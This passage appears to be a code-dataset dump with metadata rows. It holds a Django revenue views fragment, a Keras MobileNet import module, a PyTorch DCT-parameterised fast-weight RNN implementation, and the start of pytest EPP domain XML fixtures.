today = timezone.now().date()
revenueset_list = Revenue.objects.all()#filter(draft=False).filter(publish__lte=timezone.now())#.all()#.order_by("-timestamp")
#queryset_list = Post.objects.filter(draft=False).filter(publish__lte=timezone.now())#.all()#.order_by("-timestamp")
if request.user.is_staff or request.user.is_superuser:
revenueset_list = Revenue.objects.all()
revenue = request.GET.get("q")
if revenue:
revenueset_list = revenueset_list.filter(
Q(month__icontains=revenue)|
Q(total_print_map_num__icontains=revenue)|
Q(total_trace_map_num__icontains=revenue)
).distinct()
paginator = Paginator(revenueset_list, 4) # Show 4 contacts per page
page_request_var='page'
page = request.GET.get(page_request_var)
try:
revenueset = paginator.page(page)
except PageNotAnInteger:
# If page is not an integer, deliver first page.
revenueset = paginator.page(1)
except EmptyPage:
# If page is out of range (e.g. 9999), deliver last page of results.
revenueset = paginator.page(paginator.num_pages)
revenueset.order_by="publish"
context = {
"object_list":revenueset,
"title":"List",
"page_request_var":page_request_var,
"today":today,
}
return render(request, "revenue_list.html", context)
def revenue_detail(request, id=None):
#instance = Post.objects(id=5)
instance = get_object_or_404(Revenue, id=id)
share_string = quote_plus(instance.month)
context = {
"month":instance.month,
"instance":instance,
"share_string":share_string
}
return render(request, "revenue_detail.html", context)#return HttpResponse("<h1>Detail<h1>")
def revenue_list_nep(request):
today = timezone.now().date()
revenueset_list = Revenue.objects.all()#filter(draft=False).filter(publish__lte=timezone.now())#.all()#.order_by("-timestamp")
#queryset_list = Post.objects.filter(draft=False).filter(publish__lte=timezone.now())#.all()#.order_by("-timestamp")
if request.user.is_staff or request.user.is_superuser:
revenueset_list = Revenue.objects.all()
revenue = request.GET.get("q")
if revenue:
revenueset_list = revenueset_list.filter(
Q(month__icontains=revenue)|
Q(total_print_map_num__icontains=revenue)|
Q(total_trace_map_num__icontains=revenue)
).distinct()
paginator = Paginator(revenueset_list, 4) # Show 4 contacts per page
page_request_var='page'
page = request.GET.get(page_request_var)
try:
revenueset = paginator.page(page)
except PageNotAnInteger:
# If page is not an integer, deliver first page.
revenueset = paginator.page(1)
except EmptyPage:
# If page is out of range (e.g. 9999), deliver last page of results.
revenueset = paginator.page(paginator.num_pages)
revenueset.order_by="publish"
context = {
"object_list":revenueset,
"title":"List",
"page_request_var":page_request_var,
"today":today,
}
return render(request, "revenue_list_nep.html", context)
def revenue_detail_nep(request, id=None):
#instance = Post.objects(id=5)
instance = get_object_or_404(Revenue, id=id)
share_string = quote_plus(instance.month)
context = {
"month":instance.month,
"instance":instance,
"share_string":share_string
}
return render(request, "revenue_detail_nep.html", context)#return HttpResponse("<h1>Detail<h1>")
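# Hypothetical URL wiring for the views above (module path, URL patterns and
# names are illustrative; the project's actual urls.py may differ):
#
#   from django.conf.urls import url
#   from revenue import views
#
#   urlpatterns = [
#       url(r'^revenue/$', views.revenue_list, name='revenue_list'),
#       url(r'^revenue/(?P<id>\d+)/$', views.revenue_detail,
#           name='revenue_detail'),
#   ]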
| 37.358491
| 130
| 0.705303
| 506
| 3,960
| 5.314229
| 0.203557
| 0.052064
| 0.041651
| 0.041651
| 0.853105
| 0.833023
| 0.833023
| 0.804016
| 0.804016
| 0.804016
| 0
| 0.009843
| 0.17904
| 3,960
| 105
| 131
| 37.714286
| 0.817287
| 0.208838
| 0
| 0.752941
| 0
| 0
| 0.075909
| 0.014152
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047059
| false
| 0
| 0.105882
| 0
| 0.2
| 0.023529
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c2d735d5df0e32fd101ce4ba36d7e1367c0d7faa
| 202
|
py
|
Python
|
keras/applications/mobilenet.py
|
ikingye/keras
|
1a3ee8441933fc007be6b2beb47af67998d50737
|
[
"MIT"
] | 5
|
2020-11-30T22:26:03.000Z
|
2020-12-01T22:34:25.000Z
|
keras/applications/mobilenet.py
|
ikingye/keras
|
1a3ee8441933fc007be6b2beb47af67998d50737
|
[
"MIT"
] | 10
|
2020-12-01T22:55:29.000Z
|
2020-12-11T18:31:46.000Z
|
keras/applications/mobilenet.py
|
ikingye/keras
|
1a3ee8441933fc007be6b2beb47af67998d50737
|
[
"MIT"
] | 15
|
2020-11-30T22:12:22.000Z
|
2020-12-09T01:32:48.000Z
|
from tensorflow.keras.applications.mobilenet import MobileNet
from tensorflow.keras.applications.mobilenet import decode_predictions
from tensorflow.keras.applications.mobilenet import preprocess_input
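# Minimal usage sketch for the re-exported names above. Assumes the
# 'imagenet' weights can be downloaded; the random input is illustrative only.
if __name__ == '__main__':
    import numpy as np

    model = MobileNet(weights='imagenet')  # default 224x224x3 input
    x = np.random.uniform(0, 255, size=(1, 224, 224, 3)).astype('float32')
    preds = model.predict(preprocess_input(x))
    # decode_predictions turns class probabilities into (id, name, score) tuples
    print(decode_predictions(preds, top=3))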
| 50.5
| 70
| 0.89604
| 23
| 202
| 7.782609
| 0.434783
| 0.234637
| 0.318436
| 0.519553
| 0.77095
| 0.77095
| 0
| 0
| 0
| 0
| 0
| 0
| 0.059406
| 202
| 3
| 71
| 67.333333
| 0.942105
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
6c207881036cc5b79b74deb0da28511ec1ef7a2e
| 22,071
|
py
|
Python
|
dct_fast_rnn.py
|
kazuki-irie/dct-fast-weights
|
b2d81b910d6a879b832f5066a22a064ba57b7ff2
|
[
"MIT"
] | 4
|
2021-07-08T07:35:23.000Z
|
2022-01-05T03:00:34.000Z
|
dct_fast_rnn.py
|
kazuki-irie/dct-fast-weights
|
b2d81b910d6a879b832f5066a22a064ba57b7ff2
|
[
"MIT"
] | null | null | null |
dct_fast_rnn.py
|
kazuki-irie/dct-fast-weights
|
b2d81b910d6a879b832f5066a22a064ba57b7ff2
|
[
"MIT"
] | null | null | null |
# Fast RNN models with DCT-parameterized weights;
# DCT coefficients are parameterised by LSTMs.
import math
import torch
import torch.nn as nn
import torch_dct as dct
from external_torch_dct import DCTLayer
from custom_layer import LinearWithDCT
# Fast weight RNN layer with DCT-parameterized weights;
# DCT coefficients of both feed-forward and recurrent weights are
# parameterised by a "single" LSTM.
class FastDctRNN(nn.Module):
'''RNN with weights generated by DCT-related ops.'''
def __init__(self, input_dim, hidden_dim, sparsity_ih, sparsity_hh,
fast_weight_drop=0.0, dropout_dct=False, cuda=True,
batch_size=-1, coef_scale=True):
super(FastDctRNN, self).__init__()
self.input_dim = input_dim
self.hidden_dim = hidden_dim
self.sparsity_ih = sparsity_ih
self.sparsity_hh = sparsity_hh
self.weight_drop = fast_weight_drop
self.dropout_dct = dropout_dct
self.cuda = cuda
self.batch_size = batch_size
if fast_weight_drop > 0.0:
self.wdrop = nn.Dropout(fast_weight_drop)
in_coeffs_dim, in_num_diags = self.get_sparse_config(
input_dim, hidden_dim, sparsity_ih)
hidden_coeffs_dim, hidden_num_diags = self.get_sparse_config(
hidden_dim, hidden_dim, sparsity_hh)
self.in_dct_layer = DCTLayer(
in_features=input_dim, type='dct', norm='ortho', cuda=cuda)
self.hid_dct_layer = DCTLayer(
in_features=hidden_dim, type='dct', norm='ortho', cuda=cuda)
self.in_idct_layer = DCTLayer(
in_features=input_dim, type='idct', norm='ortho', cuda=cuda)
self.hid_idct_layer = DCTLayer(
in_features=hidden_dim, type='idct', norm='ortho', cuda=cuda)
self.linear_with_dct = LinearWithDCT.apply
# number of diagonals
self.in_num_diags = in_num_diags
self.hidden_num_diags = hidden_num_diags
# number of DCT coefficients
self.in_coeffs_dim = in_coeffs_dim
self.hidden_coeffs_dim = hidden_coeffs_dim
self.fast_h_dim = self.in_coeffs_dim + self.hidden_coeffs_dim
self.fast_weights_lstm = nn.LSTM(input_dim, self.fast_h_dim)
print(f"Number of fast parameters: {self.fast_h_dim}")
if cuda:
device = "cuda"
self.coef_scale = coef_scale
if coef_scale:
print(f"coef_scale: {coef_scale}")
self.coef_scaler = nn.Parameter(
torch.ones([self.fast_h_dim], device=device),
requires_grad=True)
# This assumes that the batch size is same for all batches;
# which is ensured by the batch construction, but still not nice.
# TODO make this flexible.
self.ih_weights_f = torch.zeros(
[batch_size, self.hidden_dim, self.input_dim], device=device)
self.hh_weights_f = torch.zeros(
[batch_size, self.hidden_dim, self.hidden_dim], device=device)
# ih
list = []
# shape (2, len_coeffs)
ind = torch.triu_indices(
self.hidden_dim, self.input_dim, self.in_num_diags, device=device)
for i in range(batch_size):
for t in torch.unbind(ind, 1):
# (2, len_coeffs) -> (3, len_coeffs)
list.append(
torch.cat((torch.tensor([i], device=device), t), dim=0))
self.ih_ind = torch.stack(list).t()
# hh
list = []
ind = torch.triu_indices(self.hidden_dim, self.hidden_dim,
self.hidden_num_diags, device=device)
for i in range(batch_size):
for t in torch.unbind(ind, 1):
list.append(
torch.cat((torch.tensor([i], device=device), t), dim=0))
self.hh_ind = torch.stack(list).t()
bias_init = torch.rand([hidden_dim])
initrange = 1.0 / math.sqrt(hidden_dim)
nn.init.uniform_(bias_init, -initrange, initrange)
self.bias = nn.Parameter(bias_init)
def get_dct_init(self, len_coeffs, dim_out, dim_in, diag_shift):
factor = 1.
init = torch.rand([dim_out, dim_in])
if self.cuda: # TODO update to device.
init = init.cuda()
initrange = 1.0 / math.sqrt(dim_out)
nn.init.uniform_(init, -initrange, initrange)
init_f = torch.fliplr(dct.dct_2d(init, norm='ortho'))
ind = torch.triu_indices(dim_out, dim_in, diag_shift)
coeffs_init = init_f[tuple(ind)] * factor
return coeffs_init
def to_weights(self, coeffs, ind, zero_weights, linear1, linear2):
zero_weights_ = zero_weights.clone()
weights = torch.fliplr(zero_weights_.index_put_(tuple(ind), coeffs))
weights = linear1(weights)
weights = linear2(weights.transpose(-1, -2))
return weights.transpose(-1, -2)
def get_sparse_config(self, in_dim, out_dim, sparsity_level):
'''Get num_diagonals and num coeffs.
Given the dimension of matrix
in_dim: number of columns
out_dim: number of rows
We want to find the right diagonal shift "d" s.t.
N(d) < thr(desired sparsity) < N(d+1)
We search as follows:
- If: N(0) is below thr: try N(n) for n = -1..-out_dim
- Else: try N(n) for n = 1..in_dim
input: 2 dimensions of the weight matrix
output: tuple (num_coeffs, num_diagonals)
'''
total_el = in_dim * out_dim
thr = int(total_el * (1 - sparsity_level)) # just truncate fraction.
for num_diag in range(in_dim): # upper triangular matrix.
non_zeros = torch.triu_indices(out_dim, in_dim, num_diag).size()[1]
if non_zeros < thr:
break
if num_diag == 0: # also check the other direction
for neg_diag in range(-1, -out_dim, -1):
new_non_zeros = torch.triu_indices(
out_dim, in_dim, neg_diag).size()[1]
if new_non_zeros > thr:
# means that the previous one was the good one.
break
else:
non_zeros = new_non_zeros
num_diag = neg_diag
print(f"sparsity: {(total_el - non_zeros) / total_el * 100 :.1f} %"
f" vs. desired sparsity {sparsity_level * 100} %")
return non_zeros, num_diag
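    # Worked example (hypothetical numbers, only to illustrate the search in
    # get_sparse_config above): with in_dim=4, out_dim=4, sparsity_level=0.5
    # we get thr = int(16 * 0.5) = 8; N(0) = 10 coefficients (>= thr) and
    # N(1) = 6 (< thr), so the loop stops at num_diag=1 and the method
    # returns (6, 1), i.e. 6 DCT coefficients kept, for an effective sparsity
    # of (16 - 6) / 16 = 62.5 %.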
def get_weights(self, device):
# Generate the full weights.
# return: weights of shape (hidden_dim * 4 , input_dim * hidden_dim)
# input to hidden
w_ih = None
coeffs = self.coeffs_ih
if self.dropout_dct:
coeffs = self.wdrop(coeffs)
weights = self.to_weights(
coeffs, self.ih_ind, self.ih_weights_f,
self.in_dct_layer, self.hid_dct_layer)
if w_ih is not None:
w_ih = torch.cat([w_ih, weights], dim=0)
else:
w_ih = weights
# hidden to hidden
w_hh = None
coeffs = self.coeffs_hh
if self.dropout_dct:
coeffs = self.wdrop(coeffs)
weights = self.to_weights(
coeffs, self.hh_ind, self.hh_weights_f,
self.hid_dct_layer, self.hid_dct_layer)
if w_hh is not None:
w_hh = torch.cat([w_hh, weights], dim=0)
else:
w_hh = weights
# concatenate both
# weights = torch.cat([w_ih, w_hh], dim=1)
return (w_ih, w_hh)
def forward(self, input_, hidden=None):
# input shape: (len, B, dim)
# output shape: (len * B, num_classes)
outputs = []
if hidden is None:
hidden_fast_weight = (
torch.zeros(1, input_.shape[1], self.fast_h_dim,
device=input_.device),
torch.zeros(1, input_.shape[1], self.fast_h_dim,
device=input_.device))
hidden = torch.zeros(
1, input_.shape[1], self.hidden_dim, device=input_.device)
else:
h, hidden_fast_weight = hidden
hidden = h
# compute fast weight first.
fast_output, hidden_fast_weight = self.fast_weights_lstm(
input_, hidden_fast_weight)
fast_output = torch.unbind(fast_output, dim=0)
for i, x in enumerate(torch.unbind(input_, dim=0)):
weights = fast_output[i]
if self.weight_drop > 0.0:
weights = self.wdrop(weights)
h = self.forward_step(x, hidden, weights)
outputs.append(h.clone())
hidden = h
op = torch.squeeze(torch.stack(outputs))
hidden = (h, hidden_fast_weight)
return op, hidden
def forward_step(self, x, prev_state, weights=None):
assert weights is not None
# One time step forwarding.
# input x: (B, in_dim)
# apply scalers to coeffs:
if self.coef_scale:
weights = self.coef_scaler.unsqueeze(0) * weights
ih_weight, hh_weight = torch.split(
weights, [self.in_coeffs_dim, self.hidden_coeffs_dim], dim=1)
h = torch.squeeze(prev_state)
bsz = x.shape[0]
if bsz != self.batch_size: # take sub-tensors
total_dim_coeffs = int(
bsz * self.ih_ind.shape[-1] / self.batch_size)
ih_ind = self.ih_ind[:, : total_dim_coeffs]
total_dim_coeffs = int(
bsz * self.hh_ind.shape[-1] / self.batch_size)
hh_ind = self.hh_ind[:, : total_dim_coeffs]
else:
ih_ind = self.ih_ind
hh_ind = self.hh_ind
out = self.linear_with_dct(
x, ih_weight,
self.in_idct_layer.weight,
self.hid_idct_layer.weight,
self.in_dct_layer.weight, self.hid_dct_layer.weight,
ih_ind, self.ih_weights_f, None)
out = out + self.linear_with_dct(
h, hh_weight, self.hid_idct_layer.weight,
self.hid_idct_layer.weight, self.hid_dct_layer.weight,
self.hid_dct_layer.weight,
hh_ind, self.hh_weights_f, self.bias)
out = torch.tanh(out)
return out
# Fast weight RNN layer with DCT-parameterized weights;
# DCT coefficients of feed-forward and recurrent weights are
# parameterised by "separate" LSTMs.
class SeparateFastDctRNN(nn.Module):
'''RNN with weights generated by DCT-related ops.'''
def __init__(self, input_dim, hidden_dim, sparsity_ih, sparsity_hh,
fast_weight_drop=0.0, dropout_dct=False, cuda=True,
batch_size=-1, coef_scale=True):
super(SeparateFastDctRNN, self).__init__()
self.input_dim = input_dim
self.hidden_dim = hidden_dim
self.sparsity_ih = sparsity_ih
self.sparsity_hh = sparsity_hh
self.weight_drop = fast_weight_drop
self.dropout_dct = dropout_dct
self.cuda = cuda
self.batch_size = batch_size
if fast_weight_drop > 0.0:
self.wdrop = nn.Dropout(fast_weight_drop)
in_coeffs_dim, in_num_diags = self.get_sparse_config(
input_dim, hidden_dim, sparsity_ih)
hidden_coeffs_dim, hidden_num_diags = self.get_sparse_config(
hidden_dim, hidden_dim, sparsity_hh)
self.in_dct_layer = DCTLayer(
in_features=input_dim, type='dct', norm='ortho', cuda=cuda)
self.hid_dct_layer = DCTLayer(
in_features=hidden_dim, type='dct', norm='ortho', cuda=cuda)
self.in_idct_layer = DCTLayer(
in_features=input_dim, type='idct', norm='ortho', cuda=cuda)
self.hid_idct_layer = DCTLayer(
in_features=hidden_dim, type='idct', norm='ortho', cuda=cuda)
self.linear_with_dct = LinearWithDCT.apply
# number of diagonals
self.in_num_diags = in_num_diags
self.hidden_num_diags = hidden_num_diags
# number of coefficients
self.in_coeffs_dim = in_coeffs_dim
self.hidden_coeffs_dim = hidden_coeffs_dim
self.fast_weights_lstm_ih = nn.LSTM(input_dim, in_coeffs_dim)
print(f"Number of fast params input-to-hidden: {in_coeffs_dim}")
self.fast_weights_lstm_hh = nn.LSTM(input_dim, hidden_coeffs_dim)
print(f"Number of fast params hidden-to-hidden: {hidden_coeffs_dim}")
if cuda:
device = "cuda"
self.coef_scale = coef_scale
if coef_scale:
print(f"coef_scale: {coef_scale}")
self.coef_scaler_ih = nn.Parameter(
torch.ones([in_coeffs_dim], device=device), requires_grad=True)
self.coef_scaler_hh = nn.Parameter(
torch.ones([hidden_coeffs_dim], device=device),
requires_grad=True)
# This assumes that the batch size is same for all batches;
# which is ensured by the batch construction, but still not nice.
# TODO make this flexible.
self.ih_weights_f = torch.zeros(
[batch_size, self.hidden_dim, self.input_dim], device=device)
self.hh_weights_f = torch.zeros(
[batch_size, self.hidden_dim, self.hidden_dim], device=device)
# ih
list = []
# shape (2, len_coeffs)
ind = torch.triu_indices(
self.hidden_dim, self.input_dim, self.in_num_diags, device=device)
for i in range(batch_size):
# (2, len_coeffs) -> (3, len_coeffs)
for t in torch.unbind(ind, 1):
list.append(
torch.cat((torch.tensor([i], device=device), t), dim=0))
self.ih_ind = torch.stack(list).t()
# hh
list = []
ind = torch.triu_indices(
self.hidden_dim, self.hidden_dim, self.hidden_num_diags,
device=device)
for i in range(batch_size):
for t in torch.unbind(ind, 1):
list.append(
torch.cat((torch.tensor([i], device=device), t), dim=0))
self.hh_ind = torch.stack(list).t()
bias_init = torch.rand([hidden_dim])
initrange = 1.0 / math.sqrt(hidden_dim)
nn.init.uniform_(bias_init, -initrange, initrange)
self.bias = nn.Parameter(bias_init)
def get_dct_init(self, len_coeffs, dim_out, dim_in, diag_shift):
factor = 1.
init = torch.rand([dim_out, dim_in])
if self.cuda: # TODO update to device.
init = init.cuda()
initrange = 1.0 / math.sqrt(dim_out)
# initrange = 0.1
nn.init.uniform_(init, -initrange, initrange)
init_f = torch.fliplr(dct.dct_2d(init, norm='ortho'))
ind = torch.triu_indices(dim_out, dim_in, diag_shift)
# coeffs_init = init_f[ind.numpy()] * factor
coeffs_init = init_f[tuple(ind)] * factor
return coeffs_init
def to_weights(self, coeffs, ind, zero_weights, linear1, linear2):
zero_weights_ = zero_weights.clone()
weights = torch.fliplr(zero_weights_.index_put_(tuple(ind), coeffs))
# weights = dct.idct_2d(weights)
weights = linear1(weights)
weights = linear2(weights.transpose(-1, -2))
return weights.transpose(-1, -2)
def get_sparse_config(self, in_dim, out_dim, sparsity_level):
'''Get num_diagonals and num coeffs.
Given the dimension of matrix
in_dim: number of columns
out_dim: number of rows
We want to find the right diagonal shift "d" s.t.
N(d) < thr(desired sparsity) < N(d+1)
We search as follows:
- If: N(0) is below thr: try N(n) for n = -1..-out_dim
- Else: try N(n) for n = 1..in_dim
input: 2 dimensions of the weight matrix
output: tuple (num_coeffs, num_diagonals)
'''
total_el = in_dim * out_dim
thr = int(total_el * (1 - sparsity_level)) # just truncate fraction.
for num_diag in range(in_dim): # upper triangular matrix.
non_zeros = torch.triu_indices(out_dim, in_dim, num_diag).size()[1]
if non_zeros < thr:
break
if num_diag == 0: # also check the other direction
for neg_diag in range(-1, -out_dim, -1):
new_non_zeros = torch.triu_indices(
out_dim, in_dim, neg_diag).size()[1]
if new_non_zeros > thr:
# means that the previous one was the good one.
break
else:
non_zeros = new_non_zeros
num_diag = neg_diag
print(f"sparsity: {(total_el - non_zeros) / total_el * 100 :.1f} %"
f" vs. desired sparsity {sparsity_level * 100} %")
return non_zeros, num_diag
def get_weights(self, device):
# Generate the full weights.
# return: weights of shape (hidden_dim * 4 , input_dim * hidden_dim)
# input to hidden
w_ih = None
coeffs = self.coeffs_ih
if self.dropout_dct:
coeffs = self.wdrop(coeffs)
weights = self.to_weights(
coeffs, self.ih_ind, self.ih_weights_f,
self.in_dct_layer, self.hid_dct_layer)
if w_ih is not None:
w_ih = torch.cat([w_ih, weights], dim=0)
else:
w_ih = weights
# hidden to hidden
w_hh = None
coeffs = self.coeffs_hh
if self.dropout_dct:
coeffs = self.wdrop(coeffs)
weights = self.to_weights(
coeffs, self.hh_ind, self.hh_weights_f,
self.hid_dct_layer, self.hid_dct_layer)
if w_hh is not None:
w_hh = torch.cat([w_hh, weights], dim=0)
else:
w_hh = weights
# concatenate both
# weights = torch.cat([w_ih, w_hh], dim=1)
return (w_ih, w_hh)
def forward(self, input_, hidden=None, device='cuda'):
# input shape: (len, B, dim)
# output shape: (len * B, num_classes)
outputs = []
if hidden is None:
hidden_fast_weight_ih = (
torch.zeros(1, input_.shape[1], self.in_coeffs_dim,
device=input_.device),
torch.zeros(1, input_.shape[1], self.in_coeffs_dim,
device=input_.device))
hidden_fast_weight_hh = (
torch.zeros(1, input_.shape[1], self.hidden_coeffs_dim,
device=input_.device),
torch.zeros(1, input_.shape[1], self.hidden_coeffs_dim,
device=input_.device))
hidden = torch.zeros(
1, input_.shape[1], self.hidden_dim, device=input_.device)
else:
h, hidden_fast_weight_ih, hidden_fast_weight_hh = hidden
hidden = h
# compute fast weight first.
fast_output_ih, hidden_fast_weight_ih = self.fast_weights_lstm_ih(
input_, hidden_fast_weight_ih)
fast_output_hh, hidden_fast_weight_hh = self.fast_weights_lstm_hh(
input_, hidden_fast_weight_hh)
fast_output_ih = torch.unbind(fast_output_ih, dim=0)
fast_output_hh = torch.unbind(fast_output_hh, dim=0)
for i, x in enumerate(torch.unbind(input_, dim=0)):
weights_ih = fast_output_ih[i]
weights_hh = fast_output_hh[i]
if self.weight_drop > 0.0:
weights_ih = self.wdrop(weights_ih)
weights_hh = self.wdrop(weights_hh)
h = self.forward_step(x, hidden, weights_ih, weights_hh)
outputs.append(h.clone())
hidden = h
op = torch.squeeze(torch.stack(outputs))
hidden = (h, hidden_fast_weight_ih, hidden_fast_weight_hh)
return op, hidden
def forward_step(self, x, prev_state, ih_weight=None, hh_weight=None):
assert ih_weight is not None
assert hh_weight is not None
# One time step forwarding.
# input x: (B, in_dim)
# prev_state: tuple 2 * (B, out_dim)
h = torch.squeeze(prev_state)
bsz = x.shape[0]
if bsz != self.batch_size: # take sub-tensors
total_dim_coeffs = int(
bsz * self.ih_ind.shape[-1] / self.batch_size)
ih_ind = self.ih_ind[:, : total_dim_coeffs]
total_dim_coeffs = int(
bsz * self.hh_ind.shape[-1] / self.batch_size)
hh_ind = self.hh_ind[:, : total_dim_coeffs]
else:
ih_ind = self.ih_ind
hh_ind = self.hh_ind
if self.coef_scale:
ih_weight = ih_weight * self.coef_scaler_ih.unsqueeze(0)
hh_weight = hh_weight * self.coef_scaler_hh.unsqueeze(0)
out = self.linear_with_dct(
x, ih_weight,
self.in_idct_layer.weight, self.hid_idct_layer.weight,
self.in_dct_layer.weight, self.hid_dct_layer.weight,
ih_ind, self.ih_weights_f, None)
out = out + self.linear_with_dct(
h, hh_weight, self.hid_idct_layer.weight,
self.hid_idct_layer.weight, self.hid_dct_layer.weight,
self.hid_dct_layer.weight,
hh_ind, self.hh_weights_f, self.bias)
out = torch.tanh(out)
return out
if __name__ == '__main__':
# Simple forwarding
batch_size = 3
seq_len = 5
input_dim = 10
hidden_dim = 20
sparsity_ih = 0.8
sparsity_hh = 0.8
print('FastDctRNN')
dct_fast_rnn = FastDctRNN(
input_dim, hidden_dim, sparsity_ih, sparsity_hh, batch_size=batch_size)
dct_fast_rnn = dct_fast_rnn.to('cuda')
input = torch.randn(seq_len, batch_size, input_dim, device='cuda')
output, all_states = dct_fast_rnn(input)
print(output.shape)
print('SeparateFastDctRNN')
dct_fast_rnn_twin = SeparateFastDctRNN(
input_dim, hidden_dim, sparsity_ih, sparsity_hh, batch_size=batch_size)
dct_fast_rnn_twin = dct_fast_rnn_twin.to('cuda')
output, all_states = dct_fast_rnn_twin(input)
print(output.shape)
| 35.946254
| 79
| 0.596393
| 2,989
| 22,071
| 4.127133
| 0.07996
| 0.029912
| 0.016861
| 0.017023
| 0.877351
| 0.871595
| 0.86049
| 0.845006
| 0.822147
| 0.811608
| 0
| 0.009621
| 0.307734
| 22,071
| 613
| 80
| 36.004894
| 0.797762
| 0.134339
| 0
| 0.798526
| 0
| 0
| 0.029268
| 0
| 0
| 0
| 0
| 0.003263
| 0.007371
| 1
| 0.034398
| false
| 0
| 0.014742
| 0
| 0.083538
| 0.027027
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
66659baa05e180bc8eef4e216c5b218171dbbf6f
| 34,244
|
py
|
Python
|
tests/unit/domain/conftest.py
|
ivcmartello/registrobrepp
|
dece39a451bcdb964d337df6aa7bd418a60c1a85
|
[
"MIT"
] | null | null | null |
tests/unit/domain/conftest.py
|
ivcmartello/registrobrepp
|
dece39a451bcdb964d337df6aa7bd418a60c1a85
|
[
"MIT"
] | null | null | null |
tests/unit/domain/conftest.py
|
ivcmartello/registrobrepp
|
dece39a451bcdb964d337df6aa7bd418a60c1a85
|
[
"MIT"
] | null | null | null |
import pytest
from decouple import config
@pytest.fixture
def domainxmlschema():
from lxml import etree
schema = config('EPPSCHEMAPATH', '../../../schemas') + '/domain-1.0.xsd'
xmlschema_doc = etree.parse(schema)
return etree.XMLSchema(xmlschema_doc)
@pytest.fixture
def checkdomaincommandxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<check>
<domain:check xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>du.eti.br</domain:name>
<domain:name>nic.br</domain:name>
<domain:name>registro.br</domain:name>
</domain:check>
</check>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def checkdomaincommandwithlaunchxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<check>
<domain:check xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>du.eti.br</domain:name>
<domain:name>nic.br</domain:name>
<domain:name>registro.br</domain:name>
</domain:check>
</check>
<extension>
<launch:check type="claims" xmlns:launch="urn:ietf:params:xml:ns:launch-1.0">
<launch:phase>claims</launch:phase>
</launch:check>
</extension>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def checkdomaincommandwithbrdomainxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<check>
<domain:check xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>du.eti.br</domain:name>
<domain:name>nic.br</domain:name>
<domain:name>registro.br</domain:name>
</domain:check>
</check>
<extension>
<brdomain:check xmlns:brdomain="urn:ietf:params:xml:ns:brdomain-1.0">
<brdomain:organization>005.506.560/0001-36</brdomain:organization>
</brdomain:check>
</extension>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def responsecheckdomaincommandxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<response>
<result code="1000">
<msg>Command completed successfully</msg>
</result>
<resData>
<domain:chkData xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:cd>
<domain:name avail="1">example.com</domain:name>
</domain:cd>
<domain:cd>
<domain:name avail="0">example.net</domain:name>
<domain:reason>In use</domain:reason>
</domain:cd>
<domain:cd>
<domain:name avail="1">example.org</domain:name>
</domain:cd>
</domain:chkData>
</resData>
<trID>
<clTRID>ABC-12345</clTRID>
<svTRID>54322-XYZ</svTRID>
</trID>
</response>
</epp>
"""
@pytest.fixture
def responsecheckdomaincommandwithbrdomainxmlexpected():
return """<epp xmlns='urn:ietf:params:xml:ns:epp-1.0'>
<response>
<result code='1000'>
<msg>Command completed successfully</msg>
</result>
<resData>
<domain:chkData xmlns:domain='urn:ietf:params:xml:ns:domain-1.0'>
<domain:cd>
<domain:name avail='0'>e-xample.net.br</domain:name>
<domain:reason>In use</domain:reason>
</domain:cd>
<domain:cd>
<domain:name avail='1'>example.com.br</domain:name>
</domain:cd>
<domain:cd>
<domain:name avail='1'>example.ind.br</domain:name>
</domain:cd>
<domain:cd>
<domain:name avail='0'>example.org.br</domain:name>
</domain:cd>
</domain:chkData>
</resData>
<extension>
<brdomain:chkData xmlns:brdomain='urn:ietf:params:xml:ns:brdomain-1.0'>
<brdomain:cd>
<brdomain:name>e-xample.net.br</brdomain:name>
<brdomain:equivalentName>example.net.br</brdomain:equivalentName>
<brdomain:organization>043.828.151/0001-45</brdomain:organization>
</brdomain:cd>
<brdomain:cd hasConcurrent='1'>
<brdomain:name>example.com.br</brdomain:name>
<brdomain:ticketNumber>123456</brdomain:ticketNumber>
</brdomain:cd>
<brdomain:cd inReleaseProcess='1'>
<brdomain:name>example.ind.br</brdomain:name>
</brdomain:cd>
<brdomain:cd>
<brdomain:name>example.org.br</brdomain:name>
<brdomain:organization>043.828.151/0001-45</brdomain:organization>
</brdomain:cd>
</brdomain:chkData>
</extension>
<trID>
<clTRID>ABC-12345</clTRID>
<svTRID>54322-XYZ</svTRID>
</trID>
</response>
</epp>
"""
@pytest.fixture
def createdomaincommandxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<create>
<domain:create xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>example.com</domain:name>
<domain:period unit="y">2</domain:period>
<domain:ns>
